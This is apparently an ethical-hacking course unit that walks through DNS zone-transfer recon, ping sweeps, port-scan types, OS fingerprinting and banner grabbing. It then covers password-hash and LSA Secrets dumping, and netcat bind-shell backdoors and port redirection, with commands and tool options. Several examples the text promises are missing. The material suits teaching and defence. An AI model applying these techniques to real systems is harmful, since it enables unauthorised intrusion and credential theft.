ID IN HINFO "Aspect" "MS-DOS"
ID IN MX 0 andromeda
ID IN RP jcoy.erebus jcoy.who
ID IN TXT "Location: Library"
acct21 ID IN A 192.168.230.5
ID IN HINFO "Gateway2000" "WinWKGRPS"
ID IN MX 0 exampleadmin-smtp
ID IN RP bsmith.rci bsmith.who
ID IN TXT "Location:Accounting"
We won‘t go through each record in detail, but we will point out several important types.
We see that for each entry we have an "A" record that denotes the IP address of the
system name located to the right. In addition, each host has an HINFO record that
identifies the platform or type of operating system running. HINFO records are not
needed, but they provide a wealth of information to attackers. Because we saved the
results of the zone transfer to an output file, we can easily manipulate the results with
UNIX programs such as grep, sed, awk, or perl.
[bash]$ grep -i solaris /tmp/zone_out | wc -l
388
We can see that we have 388 potential records that reference the word "Solaris."
Obviously, we have plenty of targets.
Suppose we wanted to find test systems, which happen to be a favorite choice for
attackers because they normally don't have many security features enabled, often
have easily guessed passwords, and administrators tend not to notice or care who logs
in to them. They're a perfect home for any interloper. Thus, we can search for test
systems as follows:
[bash]$ grep -i test /tmp/zone_out | wc -l
96
So we have approximately 96 entries in the zone file that contain the word "test." This
should equate to a fair number of actual test systems. These are just a few simple
examples. Most intruders will slice and dice this data to zero in on specific system types
with known vulnerabilities.
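As a hedged sketch of this slicing and dicing, standard UNIX text tools are enough to count records mentioning a platform of interest and to pair each hostname with its address. The zone file contents below are invented for illustration, reusing the simulated record format shown earlier:

```shell
# Build a small simulated zone-transfer output file (invented records).
cat > /tmp/zone_out <<'EOF'
acct18 ID IN A 192.168.230.3
ID IN HINFO "Gateway2000" "WinWKGRPS"
au ID IN A 192.168.230.4
ID IN HINFO "Aspect" "MS-DOS"
acct21 ID IN A 192.168.230.5
ID IN HINFO "Gateway2000" "WinWKGRPS"
EOF

# Count HINFO records mentioning a platform of interest...
grep -c "WinWKGRPS" /tmp/zone_out

# ...and pair each A record's hostname with its IP address.
awk '/ IN A /{print $1, $5}' /tmp/zone_out
```

The same pattern extends naturally to sed or perl for more elaborate filtering, which is exactly the "slice and dice" step an intruder performs on a captured zone.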
Keep a few points in mind. First, the aforementioned method queries only one
nameserver at a time. This means you would have to perform the same tasks for all
nameservers that are authoritative for the target ___domain. In addition, we queried only
the example.com ___domain. If there were subdomains, we would have to perform the
same type of query for each subdomain (for example, greenhouse.example.com).
Finally, you may receive a message stating that you can‘t list the ___domain or that the
query was refused. This usually indicates that the server has been configured to
disallow zone transfers from unauthorized users. Therefore, you will not be able to
perform a zone transfer from this server. However, if there are multiple DNS servers,
you may be able to find one that will allow zone transfers.
Now that we have shown you the manual method, let's look at the many tools that speed
the process, including host, Sam Spade, axfr, and dig.
The host command comes with many flavors of UNIX. Some simple ways of using host
are as follows:
host -l example.com
and
host -l -v -t any example.com
If you need just the IP addresses to feed into a shell script, you can cut them out of
the host output:
host -l example.com | cut -f 4 -d " " >> /tmp/ip_out
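Since the address is the fourth space-delimited field of each `host -l` line, the cut approach can be sanity-checked offline against canned output. The records below are invented for illustration:

```shell
# Simulate `host -l example.com` style output (records invented),
# then cut out just the IP addresses (field 4, space-delimited).
cat > /tmp/host_out <<'EOF'
gate.example.com has address 192.168.1.1
www.example.com has address 192.168.1.10
mail.example.com has address 192.168.1.25
EOF
cut -f 4 -d ' ' /tmp/host_out
```

The resulting list of bare IP addresses is ready to feed into a ping sweep or port scanner in a later step.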
Not all footprinting functions must be performed through UNIX commands. A number of
Windows products, such as Sam Spade, provide the same information.
The UNIX dig command is a favorite with DNS administrators and is often used to
troubleshoot DNS architectures. It too can perform the various DNS interrogations
mentioned in this section. It has too many command-line options to list here; the man
page explains its features in detail.
Traceroute is a diagnostic tool originally written by Van Jacobson that lets you view the
route that an IP packet follows from one host to the next. Traceroute uses the "Time to
Live" (TTL) field in the IP packet to elicit an ICMP TIME_EXCEEDED message from
each router. Each router that handles the packet is required to decrement the TTL field.
Thus, the TTL field effectively becomes a hop counter. We can use the functionality of
traceroute to determine the exact path that our packets are taking. As mentioned
previously, traceroute may allow you to discover the network topology employed by the
target network, in addition to identifying access control devices (such as an application-
based firewall or packet-filtering routers) that may be filtering our traffic.
We can see the path of the packets traveling several hops to the final destination. The
packets go through the various hops without being blocked. We can assume this is a
live host and that the hop before it (10) is the border router for the organization. Hop 10
could be a dedicated application-based firewall, or it could be a simple packet-filtering
device. Generally, once you hit a live system on a network, the system before it is a
device performing routing functions (for example, a router or a firewall).
It is important to note that most flavors of traceroute in UNIX default to sending User
Datagram Protocol (UDP) packets, with the option of using Internet Control Messaging
Protocol (ICMP) packets with the –I switch. In Windows, however, the default behavior
is to use ICMP echo request packets. Therefore, your mileage may vary using each tool
if the site blocks UDP versus ICMP, and vice versa. Another interesting item of
traceroute is the –g option, which allows the user to specify loose source routing.
Therefore, if you believe the target gateway will accept source-routed packets, you
might try to enable this option with the appropriate hop pointers.
It‘s important to note that because the TTL value used in tracerouting is in the IP
header, we are not limited to UDP or ICMP packets. Literally any IP packet could be
sent. This provides for alternate tracerouting techniques to get our probes through
firewalls that are blocking UDP and ICMP packets. Two tools that allow for TCP
tracerouting to specific ports are the aptly named tcptraceroute (http://michael.toren.net
/code/tcptraceroute) and Cain & Abel (http://www.oxid.it). Additional techniques allow
you to determine specific ACLs that are in place for a given access control device.
Firewall protocol scanning is one such technique, as well as using a tool called firewalk.
Summary:
This unit provided wide coverage of hacking terminology and described the attack
methodology adopted during the reconnaissance phase. It explained the difference
between a threat and a vulnerability, and discussed the various technical and
non-technical ways of gathering information on target networks. In particular, the unit
gave special importance to the footprinting mechanisms a malicious hacker uses to
gather valuable information about a system.
Reference:
Threat, Vulnerability and Attacks: http://www.youtube.com/watch?v=cnesgEJTx2s
Questionnaires:
Objectives:
The objective of this unit is to provide in-depth knowledge of the various attack phases
and of gaining access to the target system.
Introduction:
The unit primarily covers the pre-attack phase called scanning, which enables the
attacker to gain extensive information about the target network. It takes the learner to
an advanced level of attack, providing familiarity with port scanning, vulnerability
scanning, and the use of open-source attack tools, along with a clear idea of how these
tools function and of the methodology used to gain access to target networks.
1. Scanning
If footprinting is the equivalent of casing a place for information, then scanning is
equivalent to knocking on the walls to find all the doors and windows. During
footprinting, we obtained a list of IP network blocks and IP addresses through a wide
variety of techniques, including whois and ARIN queries. These techniques provide the
security administrator or the hacker with valuable information about the target network,
including employee names and phone numbers, IP address ranges, DNS servers, and
mail servers.
One of the most basic steps in mapping out a network is performing an automated ping
sweep on a range of IP addresses and network blocks to determine if individual devices
or systems are alive. Ping is traditionally used to send ICMP ECHO (ICMP Type 8)
packets to a target system in an attempt to elicit an ICMP ECHO_REPLY (ICMP Type
0) indicating the target system is alive. Although ping is acceptable to determine the
number of systems alive in a small-to-midsize network (Class C is 254 and Class B is
65,534 potential hosts), it is inefficient for larger, enterprise networks. Scanning larger
Class A networks (16,777,214 potential hosts) can take hours if not days to complete.
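These host counts fall straight out of the netmask arithmetic: two raised to the number of host bits, minus the network and broadcast addresses. A quick check in the shell:

```shell
# Potential hosts per classful network = 2^host_bits - 2
# (subtracting the network and broadcast addresses).
echo "Class C: $((2**8  - 2)) hosts"
echo "Class B: $((2**16 - 2)) hosts"
echo "Class A: $((2**24 - 2)) hosts"
```

This prints 254, 65534, and 16777214 hosts respectively, which is why sweeping a Class A range with a serial ping is impractical.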
To perform an ICMP ping sweep, you can use a myriad of tools available for both UNIX
and Windows. One of the tried-and-true techniques of performing ping sweeps in the
UNIX world is to use fping. Unlike more traditional ping sweep utilities, which wait for a
response from each system before moving on to the next potential host, fping is a utility
that will send out massively parallel ping requests in a round-robin fashion. Thus, fping
will sweep many IP addresses significantly faster than ping. fping can be used in one of
two ways: you can feed it a series of IP addresses from standard input (stdin) or you
can have it read from a file. Having fping read from a file is easy; simply create your file
with IP addresses on each line:
192.168.51.1
192.168.51.2
192.168.51.3
...
192.168.51.253
192.168.51.254
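Rather than typing 254 addresses by hand, the input file can be generated with a one-liner; a minimal sketch (the /tmp/iplist path is just an example):

```shell
# Generate 192.168.51.1 through 192.168.51.254, one address per line,
# suitable for: fping -a -f /tmp/iplist
for i in $(seq 1 254); do
  echo "192.168.51.$i"
done > /tmp/iplist
wc -l < /tmp/iplist
```

The final wc -l confirms the file holds all 254 candidate addresses for the sweep.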
The –a option of fping will show only systems that are alive. You can also combine it
with the –d option to resolve hostnames if you choose. We prefer to use the –a option
with shell scripts and the –d option when we are interested in targeting systems that
have unique hostnames. Other options such as –f may interest you when scripting ping
sweeps. Type fping –h for a full listing of available options. Another utility that is
highlighted throughout this book is nmap from Fyodor. Although this utility is discussed
in much more detail later in this chapter, it is worth noting that it does offer ping sweep
capabilities with the –sP option.
For the Windows-inclined, we like the tried-and-true freeware product SuperScan from
Foundstone, shown in Figure 1. It is one of the fastest ping sweep utilities available.
Like fping, SuperScan sends out multiple ICMP ECHO packets (in addition to three
other types of ICMP) in parallel and simply waits and listens for responses. Also like
fping, SuperScan allows you to resolve hostnames and view the output in an HTML file.
Figure 1. SuperScan from Foundstone is one of the fastest and most flexible ping
sweep utilities available.
For those technically minded, here's a brief synopsis of the different types of ICMP
packets that can be used to ping a host. The primary ICMP types are Echo Request
(Type 8), Echo Reply (Type 0), Timestamp Request (Type 13), Information Request
(Type 15), and Address Mask Request (Type 17).
Any of these ICMP message types could potentially be used to discover a host on the
network; it just depends on the target‘s ICMP implementation and how it responds to
these packet types. How the different operating systems respond or don‘t respond to
the various ICMP types also aids in remote OS detection.
You may be wondering what happens if ICMP is blocked by the target site. It is not
uncommon to come across a security-conscious site that has blocked ICMP at the
border router or firewall. Although ICMP may be blocked, some additional tools and
techniques can be used to determine if systems are actually alive. However, they are
not as accurate or as efficient as a normal ping sweep.
When ICMP traffic is blocked, port scanning is the first alternate technique to determine
live hosts. By scanning for common ports on every potential IP address, we can
determine which hosts are alive if we can identify open or listening ports on the target
system. This technique can be time-consuming, but it can often unearth rogue systems
or highly protected systems.
For Windows, the tool we recommend is SuperScan. As discussed earlier, SuperScan
will perform both host and service discovery using ICMP and TCP/UDP, respectively.
Using the TCP/UDP port scan options, you can determine whether a host is alive or not
(without using ICMP at all). As you can see in Figure 2, simply select the check box for
each protocol you wish to use and the type of technique you desire, and you are off to
the races.
Another tool used for this host discovery technique is nmap, which runs on both UNIX
and Windows. The Windows version, which pairs nmap with a GUI wrapper called
Zenmap, is now well supported, so even the truly command-line challenged among you
can download the latest Windows version at nmap.org and get scanning quickly. Be
aware that the product installs WinPcap: if you haven't installed this application before
on your Windows system, you should know that it is a packet filter driver that allows
nmap to read and write raw packets from and to the wire.
Figure 2. Using SuperScan, hosts hidden behind traditional firewalls can be found.
As you can see in Figure 3, nmap for Windows allows for a number of ping options to
discover hosts on a network. These host discovery options have long been available to
the UNIX world, but now Windows users can also leverage them.
As mentioned previously, nmap does provide the capability to perform ICMP sweeps.
However, it offers a more advanced option called TCP ping scan. A TCP ping scan is
initiated with the –PT option and a port number such as 80. We use 80 because it is a
common port that sites will allow through their border routers to systems on their
demilitarized zone (DMZ), or even better, through their main firewall(s). This option will
spew out TCP ACK packets to the target network and wait for RST packets indicating
the host is alive. ACK packets are sent because they are more likely to get through a
non-stateful firewall such as Cisco IOS. Here's an example:
As you can see, this method is quite effective in determining if systems are alive, even if
the site blocks ICMP. It is worth trying a few iterations of this type of scan with common
ports such as SMTP (25), POP (110), AUTH (113), IMAP (143), or other ports that may
be unique to the site.
For the advanced technical reader, Hping2 from www.hping.org is an amazing TCP ping
utility for UNIX that should be in your toolbox. With additional TCP functionality beyond
nmap, Hping2 allows the user to control specific options of the UDP, TCP, or Raw IP
packet that may allow it to pass through certain access control devices.
To perform a simple TCP ping scan, set the TCP destination port with the –p option. By
doing this you can circumvent some access control devices, similar to traceroute.
Hping2 can be used to perform TCP and UDP ping sweeps and it has the ability to
fragment packets, potentially bypassing some access control devices. Here‘s an
example:
[root]# hping2 192.168.0.2 -S -p 80 -f
HPING 192.168.0.2 (eth0 192.168.0.2): S set, 40 data bytes
60 bytes from 192.168.0.2: flags=SA seq=0 ttl=64 id=418 win=5840 time=3.2 ms
60 bytes from 192.168.0.2: flags=SA seq=1 ttl=64 id=420 win=5840 time=2.1 ms
60 bytes from 192.168.0.2: flags=SA seq=2 ttl=64 id=422 win=5840 time=2.0 ms
In some cases, simple access control devices cannot handle fragmented packets
correctly, thus allowing our packets to pass through and determine if the target system
is alive. Notice that the TCP SYN (S) flag and the TCP ACK (A) flag are returned
whenever a port is open (flags=SA). Hping2 can easily be integrated into shell scripts by
using the –cN packet count option, where N is the number of packets to send before
moving on. Although this method is not as fast as some of the ICMP ping sweep
methods mentioned earlier, it may be necessary given the configuration of the target
network.
1.2. DETERMINING WHICH SERVICES ARE RUNNING OR LISTENING
We have identified systems that are alive by using either ICMP or TCP ping sweeps and
have gathered selected ICMP information. Now we are ready to begin port scanning
each system.
Port scanning is the process of sending packets to TCP and UDP ports on the target
system to determine what services are running or are in a LISTENING state. Identifying
listening ports is critical to determining the services running, and consequently the
vulnerabilities present from your remote system. Additionally, you can determine the
type and version of the operating system and applications in use. Active services that
are listening are akin to the doors and windows of your house. They are ways into the
domicile. Depending on the type of path in (a window or door), it may allow an
unauthorized user to gain access to systems that are misconfigured or running a
version of software known to have security vulnerabilities. In this section we will focus
on several popular port-scanning tools and techniques that will provide us with a wealth
of information and give us a window into the vulnerabilities of the system. The port
scanning techniques that follow differ from those previously mentioned, when we were
trying to just identify systems that are alive. For the following steps, we will assume that
the systems are alive, and we are now trying to determine all the listening ports or
potential access points on our target.
Identifying both the TCP and UDP services running on the target system
Identifying the type of operating system of the target system
Identifying specific applications or versions of a particular service
1.3. Scan Types
There are different types of Scanning methodology. Some of them are detailed below.
TCP connect scan This type of scan completes a full three-way handshake with
the target port: (1) sending a SYN packet, (2) receiving a SYN/ACK packet, and
(3) sending an ACK packet. It is easily detected and logged by the target system.
TCP SYN scan This technique is known as half-open scanning because a full TCP
connection is not made. Instead, only a SYN packet is sent to the target port. If a
SYN/ACK is received from the target port, we can deduce that it is in the
LISTENING state. If an RST/ACK is received, it usually indicates that the port is
not listening. An RST/ACK will be sent by the system performing the port scan so
that a full connection is never established. This technique has the advantage of
being stealthier than a full TCP connect, and it may not be logged by the target
system. However, one of the downsides of this technique is that this form of
scanning can produce a denial of service condition on the target by opening a
large number of half-open connections. But unless you are scanning the same
system with a high number of these connections, this technique is relatively safe.
TCP FIN scans This technique sends a FIN packet to the target port. Based on
RFC 793, the target system should send back an RST for all closed ports. This
technique usually works only on UNIX-based TCP/IP stacks.
TCP Xmas Tree scans This technique sends a FIN, URG, and PUSH packet to
the target port. Based on RFC 793, the target system should send back an RST
for all closed ports.
TCP Null scan This technique turns off all flags. Based on RFC 793, the target
system should send back an RST for all closed ports.
TCP ACK scan This technique is used to map out firewall rule sets. It can help
determine if the firewall is a simple packet filter allowing only established
connections (connections with the ACK bit set) or a stateful firewall performing
advance packet filtering.
TCP Window scan This technique may detect open as well as filtered/nonfiltered
ports on some systems due to an anomaly in the way the TCP window size is
reported.
TCP RPC scan This technique is specific to UNIX systems and is used to detect
and identify Remote Procedure Call (RPC) ports and their associated program
and version number.
UDP scan This technique sends a UDP packet to the target port. If the target
port responds with an "ICMP port unreachable" message, the port is closed.
Conversely, if you don't receive an "ICMP port unreachable" message, you can
deduce the port is open. Because UDP is known as a connectionless protocol,
the accuracy of this technique is highly dependent on many factors related to the
utilization and filtering of the target network. In addition, UDP scanning is a very
slow process if you are trying to scan a device that employs heavy packet
filtering. If you plan on doing UDP scans over the Internet, be prepared for
unreliable results.
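The asymmetry described above is easy to demonstrate with bash's /dev/udp pseudo-device (port 65531 here is an arbitrary port assumed closed): the send itself succeeds whether or not anything is listening, because UDP has no handshake and the only negative signal, an ICMP unreachable, arrives separately, if at all.

```shell
# Sending a datagram to a (presumably) closed UDP port still "succeeds":
# the sender learns nothing from the send call itself.
if echo probe > /dev/udp/127.0.0.1/65531 2>/dev/null; then
  echo "datagram sent; no reply expected either way"
fi
```

This is precisely why UDP scanners must wait on rate-limited ICMP unreachables and why their results over the Internet are so often unreliable.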
Certain IP implementations have the unfortunate distinction of sending back reset (RST)
packets for all ports scanned, regardless of whether or not they are listening. Therefore,
your results may vary when performing these scans; however, SYN and connect()
scans should work against all hosts.
A good port-scanning tool is a critical component of the footprinting process. Although
many port scanners are available for both the UNIX and Windows environments, we'll
limit our discussion to some of the more popular and time-proven port scanners.
2.1. Strobe
Strobe is a venerable TCP port-scanning utility for UNIX. Although strobe is highly
reliable, you need to keep in mind some of its limitations: it is a TCP scanner only and
does not provide UDP scanning capabilities. Therefore, in the preceding scan we are
only looking at half the picture. For additional scanning techniques beyond what strobe
can provide, we must dig deeper into our toolkit.
2.2. Udp_scan
We can use udp_scan, originally from SATAN (Security Administrator Tool for Analyzing
Networks), written by Dan Farmer and Wietse Venema in 1995. Although SATAN is a
bit dated, its tools still work quite well. In addition, newer versions of SATAN, now called
SAINT, have been released at http://wwdsilx.wwdsi.com. Many other utilities perform
UDP scans; however, to this day we have found that udp_scan is one of the most
reliable UDP scanners available. We should point out that although udp_scan is
reliable, it does have a nasty side effect of triggering a SATAN scan message on major
IDS products. Therefore, it is not one of the more stealthy tools you could employ.
Typically, we will look for all well-known ports below 1024 and specific high-risk ports
above 1024. Here‘s an example:
2.3. Netcat
Despite the "old school" nature of this raw tool, another excellent utility is netcat (or
nc), written by Hobbit. This utility can perform so many tasks that everyone in the
industry calls it the Swiss Army knife of security. It provides basic TCP and UDP port-
scanning capabilities. The –v and –vv options provide verbose and very verbose output,
respectively. The –z option provides zero mode I/O and is used for port scanning, and
the –w2 option provides a timeout value for each connection. By default, nc will use
TCP ports. Therefore, we must specify the –u option for UDP scanning, as in the
second example shown next:
The Windows UDP Port Scanner (WUPS) hails from Arne Vidstrom at
http://ntsecurity.nu. It is a reliable, graphical, and relatively snappy UDP port scanner
(depending on the delay setting), despite the fact that it can only scan one host at a time
for sequentially specified ports. It is a solid tool for quick-and-dirty single-host UDP
scans, as shown in Figure 5.
Figure 5. The Windows UDP Port Scanner (WUPS) nails a system running SNMP (UDP
161).
A complete breakdown of ScanLine's functionality can be seen in the help file dump:
sl [-?bhijnprsTUvz]
[-cdgmq ]
[-flLoO <file>]
[-tu [, - ]]
IP[,IP-IP]
This example would scan TCP ports 80, 100, 101...200 and 443 on all IP addresses
from 10.0.0.1 to 10.0.1.200 inclusive, grabbing banners from those ports and hiding
hosts that had no open ports.
The following probe types can be used for active stack fingerprinting:
FIN probe A FIN packet is sent to an open port. As mentioned previously, RFC
793 states that the correct behavior is not to respond. However, many stack
implementations (such as Windows NT/200X/Vista) will respond with a FIN/ACK.
Bogus flag probe An undefined TCP flag is set in the TCP header of a SYN
packet. Some operating systems, such as Linux, will respond with the flag set in
their response packet.
Initial Sequence Number (ISN) sampling The basic premise is to find a pattern
in the initial sequence chosen by the TCP implementation when responding to a
connection request.
"Don't fragment bit" monitoring Some operating systems will set the "Don't
fragment bit" to enhance performance. This bit can be monitored to determine
what types of operating systems exhibit this behavior.
TCP initial window size Initial window size on returned packets is tracked. For
some stack implementations, this size is unique and can greatly add to the
accuracy of the fingerprint mechanism.
ACK value IP stacks differ in the sequence value they use for the ACK field, so
some implementations will send back the sequence number you sent, and others
will send back a sequence number + 1.
ICMP error message quenching Operating systems may follow RFC 1812 and
limit the rate at which error messages are sent. By sending UDP packets to some
random high-numbered port, you can count the number of unreachable
messages received within a given amount of time. This is also helpful in
determining if UDP ports are open.
Type of service (TOS) For "ICMP port unreachable" messages, the TOS is
examined. Most stack implementations use 0, but this can vary.
TCP options TCP options are defined by RFC 793 and more recently by RFC
1323. The more advanced options provided by RFC 1323 tend to be
implemented in the most current stack implementations. By sending a packet
with multiple options set—such as no operation, maximum segment size, window
scale factor, and timestamps—it is possible to make some assumptions about
the target operating system.
Nmap employs the techniques mentioned earlier (except for the fragmentation handling
and ICMP error message quenching) by using the -O option. Let's take a look at our
target network:
By using nmap's stack fingerprinting option, we can easily ascertain the target operating
system with precision. The accuracy of the determination is largely dependent on
having at least one open port on the target. But even if no ports are open on the target
system, nmap can still make an educated guess about its operating system:
So even with no ports open, nmap correctly guessed the target operating system as
Linux.
One of the best features of nmap is that its signature listing is kept in a file called nmap-
os-fingerprints. Each time a new version of nmap is released, this file is updated with
additional signatures.
Although nmap's TCP detection seems to be the most accurate as of this writing, the
technology is not flawless and often provides only broad guesses that at times seem
less than helpful. Nmap was not, however, the first program to implement
such techniques. Queso is an operating system–detection tool that was released before
Fyodor incorporated his operating system detection into nmap. It is important to note
that queso is not a port scanner and performs only operating system detection via a
single open port (port 80 by default). If port 80 is not open on the target server, it is
necessary to specify an open port, as demonstrated next, using queso to determine the
target operating system via port 25:
6. Passive Signatures
Various characteristics of traffic can be used to identify an operating system.
TTL What does the operating system set as the time-to-live on the outbound
packet?
Window size What does the operating system set as the window size?
DF Does the operating system set the "Don't fragment bit"?
By passively analyzing each attribute and comparing the results to a known database of
attributes, you can determine the remote operating system. Although this method is not
guaranteed to produce the correct answer every time, the attributes can be combined to
generate fairly reliable results. This technique is exactly what the tool 'siphon' uses.
The tried-and-true manual mechanism for enumerating banners and application info has
traditionally been based on telnet (a remote communications tool built into most
operating systems). Using telnet to grab banners is as easy as opening a telnet
connection to a known port on the target server, pressing enter a few times, if
necessary, and seeing what comes back:
C:\>telnet www.example.com 80
HTTP/1.1 400 Bad Request
Server: Microsoft-IIS/5.0
Date: Tue, 15 Jul 2008 21:33:04 GMT
Content-Type: text/html
Content-Length: 87
<html><head><title>Error</title>
</head><body>The parameter is incorrect.
</body> </html>
This is a generic technique that works with many common applications that respond on
a standard port, such as HTTP port 80, SMTP port 25, or FTP port 21.
For a slightly more surgical probing tool, rely on netcat, the "TCP/IP Swiss Army
knife." Netcat was written by Hobbit and ported to the Windows NT family by Weld
Pond while he was with the L0pht security research group. When employed by the
enemy, it is simply devastating. Here, we will examine one of its more simplistic uses,
connecting to a remote TCP/IP port and enumerating the service banner:
C:\>nc -v www.example.com 80
www.example.com [10.219.100.1] 80 (http) open
A bit of input here usually generates some sort of a response. In this case, pressing
enter causes the following:
<html><head><title>Error</title>
</head><body>The parameter is incorrect.
</body> </html>
One tip from the netcat readme file discusses how to redirect the contents of a file into
netcat to nudge remote systems for even more information. For example, create a text
file called nudge.txt containing the single line GET / HTTP/1.0, followed by two carriage
returns, and then redirect it into netcat; the server responds as follows:
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Wed, 16 Jul 2008 01:00:32 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 8601
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCCRRABCR=BEFOAIJDCHMLJENPIPJGJACM; path=/
Cache-control: private
</HTML>
8. Gaining Access
Gaining access to a network or system is the most important phase in Ethical Hacking.
Different types of systems require different access techniques.
The power of getadmin was muted somewhat by the fact that it must be run by an
interactive user on the target system, as must most privilege-escalation attacks.
Because most users cannot log on interactively to a Windows server by default, it is
really only useful to rogue members of the various built-in Operators groups (Account,
Backup, Server, and so on) and the default Internet server account,
IUSR_machinename, which have this privilege. If malicious individuals already have the
interactive logon privilege on your server, privilege-escalation exploits aren't
going to make things much worse; they already have access to just about anything else
they'd want.
The Windows architecture still has a difficult time preventing interactively logged on
accounts from escalating privileges, due mostly to the diversity and complexity of the
Windows interactive login environment. Even worse, interactive logon has become
much more widespread as Windows Terminal Server has assumed the mantle of
remote management and distributed processing workhorse. Finally, it is important to
consider that the most important vector for privilege escalation for Internet client
systems is web browsing and e-mail processing.
We should note that obtaining Administrator status is not technically the highest
privilege one can obtain on a Windows machine. The SYSTEM account (also known as
the Local System, or NT AUTHORITY\SYSTEM, account) actually accrues more
privilege than Administrator. However, there are a few common tricks to allow
administrators to attain SYSTEM privileges quite easily. One is to open a command
shell using the Windows Scheduler service as follows:
Or you could use the free psexec tool from Sysinternals.com, which will even allow you
to run as SYSTEM remotely.
The first step in any password-cracking exercise is to obtain the password hashes.
Depending on the version of Windows in play, this can be achieved in a number of
ways.
With Administrator access, password hashes can easily be dumped directly from the
Registry into a structured format suitable for offline analysis. The original utility for
accomplishing this, called pwdump, is by Jeremy Allison, and numerous improved
versions have been released, including pwdump2 by Todd Sabin, pwdump3e by
e-business technology, Inc., and pwdump6 by the foofus.net Team.
Foofus.net also released fgdump, which is a wrapper around pwdump6 and other tools
that automates remote hash extraction, LSA cache dumping, and protected store
enumeration. The pwdump family of tools uses the technique of DLL injection to insert
themselves into a privileged running process (typically lsass.exe) in order to extract
password hashes.
pwdump6 works remotely via SMB (TCP 139 or 445) but will not work within an
interactive login session (you can still use fgdump for interactive password dumping).
The following example shows pwdump6 being used against a Server 2008 system with
the Windows Firewall disabled:
Completed.
Note the NO PASSWORD output in the third field indicating that this server is not
storing hashes in the weaker LM format.
The LSA Secrets feature is one of the most insidious examples of the danger of leaving
credentials around in a state easily accessible by privileged accounts. The Local
Security Authority (LSA) Secrets cache, available under the Registry subkey of
HKLM\SECURITY\Policy\Secrets, contains the following items:
Service account passwords in plaintext. Service accounts are required by
software that must log in under the context of a local user to perform tasks, such
as backups. They are typically accounts that exist in external domains and, when
revealed by a compromised system, can provide a way for the attacker to log in
directly to the external ___domain.
Obviously, service account passwords that run under ___domain user privileges, last user
login, workstation ___domain access passwords, and so on, can all give an attacker a
stronger foothold in the ___domain structure.
For example, imagine a stand-alone server running Microsoft SMS or SQL services that
run under the context of a ___domain user. If this server has a blank local Administrator
password, LSA Secrets could be used to gain the ___domain-level user account and
password. This vulnerability could also lead to the compromise of a master user ___domain
configuration. If a resource ___domain server has a service executing in the context of a
user account from the master user ___domain, a compromise of the server in the resource
___domain could allow our malicious interloper to obtain credentials in the master ___domain.
Paul Ashton is credited with posting code to display the LSA Secrets to administrators
logged on locally. An updated version of this code, called lsadump2, is available at
http://razor.bindview.com/tools. lsadump2 uses the same technique as pwdump2 (DLL
injection) to bypass all operating system security. lsadump2 automatically finds the PID
of LSASS, injects itself, and grabs the LSA Secrets, as shown here (line wrapped and
edited for brevity):
We can see the machine account password for the ___domain and two SQL service
account–related passwords among the LSA Secrets for this system. It doesn't take
much imagination to discover that large Windows networks can be toppled quickly
through this kind of password enumeration.
Starting in Windows XP, Microsoft moved some things around and rendered lsadump2
inoperable when run as anything but the SYSTEM account. Modifications to the
lsadump2 source code have been posted that get around this issue. The all-purpose
Windows hacking tool Cain also has a built-in LSA Secrets extractor that bypasses
these issues when run as an administrative account.
Cain also has a number of other cached password extractors that work against a local
machine if run under administrative privileges. Figure 6 shows Cain extracting the
LSA Secrets from a Windows XP Service Pack 2 system and also illustrates the other
repositories from which Cain can extract passwords, including Protected Storage,
Internet Explorer 7, wireless networking, Windows Mail, dial-up connections, edit boxes,
SQL Enterprise Manager, and Credential Manager.
Figure 6. Cain's password cache decoding tools work against the local system when run
with administrative privileges.
Windows also caches the credentials of users who have previously logged in to a
___domain. By default, the last ten logons are retained in this fashion. Utilizing these
credentials is not as straightforward as the cleartext extraction provided by LSADump,
however, since the passwords are stored in hashed form and further encrypted with a
machine-specific key. The encrypted cached hashes (try saying that ten times fast!) are
stored under the Registry key HKLM\SECURITY\CACHE\NL$n, where n represents a
numeric value from 1 to 10 corresponding to the last ten cached logons.
The hashes must, of course, be subsequently cracked to reveal the cleartext passwords
(updated tools for performing "pass the hash," or directly reusing the hashed password
as a credential rather than decrypting it, have not been published for some time). Any of
the Windows password-cracking tools we've discussed in this chapter can perform this
task. One other tool we haven't mentioned yet, cachebf, will directly crack output from
CacheDump. You can find cachebf at http://www.toolcrypt.org/tools/cachebf/index.html.
Once Administrator access has been achieved and passwords extracted, intruders
typically seek to consolidate their control of a system through various services that
enable remote control. Such services are sometimes called back doors and are typically
hidden using various stealth techniques.
The -L option makes the listener persistent across multiple connection breaks; -d runs
netcat in stealth mode (with no interactive console); and -e specifies the program to
launch (in this case, cmd.exe, the Windows command interpreter). Finally, -p specifies
the port to listen on. This will return a remote command shell to any intruder connecting
to port 8080.
In the next sequence, we use netcat on a remote system to connect to the listening port
on the machine shown earlier (IP address 192.168.202.44) and receive a remote
command shell. To reduce confusion, we have again set the local system command
prompt to D:\> while the remote prompt is C:\TEMP\NC11Windows>.
As you can see, remote users can now execute commands and launch files. They are
limited only by how creative they can get with the Windows console.
Netcat works well when you need a custom port over which to work, but if you have
access to SMB (TCP 139 or 445), the best tool is psexec, from
http://www.sysinternals.com. psexec simply executes a command on the remote
machine using the following syntax:
The Metasploit framework also provides a large array of back door payloads that can
spawn new command-line shells bound to listening ports, execute arbitrary commands,
spawn shells using established connections, and connect a command shell back to the
attacker's machine, to name a few (see http://metasploit.com:55555/PAYLOADS). For
browser-based exploits, Metasploit has ActiveX controls that can be executed via a
hidden IEXPLORE.exe over HTTP connections.
9. Port Redirection
We've discussed a few command shell–based remote control programs in the context of
direct remote control connections. However, consider the situation in which an
intervening entity such as a firewall blocks direct access to a target system. Resourceful
attackers can find their way around these obstacles using port redirection. Port
redirection is a technique that can be implemented on any operating system, but we‘ll
cover some Windows-specific tools and techniques here.
Once attackers have compromised a key target system, such as a firewall, they can use
port redirection to forward all packets to a specified destination. The impact of this type
of compromise is important to appreciate because it enables attackers to access any
and all systems behind the firewall (or other target). Redirection works by listening on
certain ports and forwarding the raw packets to a specified secondary target.
9.1. Fpipe
Fpipe is a TCP source port forwarder/redirector from Foundstone, Inc. It can create a
TCP stream with an optional source port of the user's choice. This is useful during
penetration testing for getting past firewalls that permit certain types of traffic through to
internal networks.
Fpipe basically works by redirection. Start fpipe with a listening server port, a remote
destination port (the port you are trying to reach inside the firewall), and the (optional)
local source port number you want. When fpipe starts, it will wait for a client to connect
on its listening port. When a listening connection is made, a new connection to the
destination machine and port with the specified local source port will be made, thus
creating a complete circuit. When the full connection has been established, fpipe
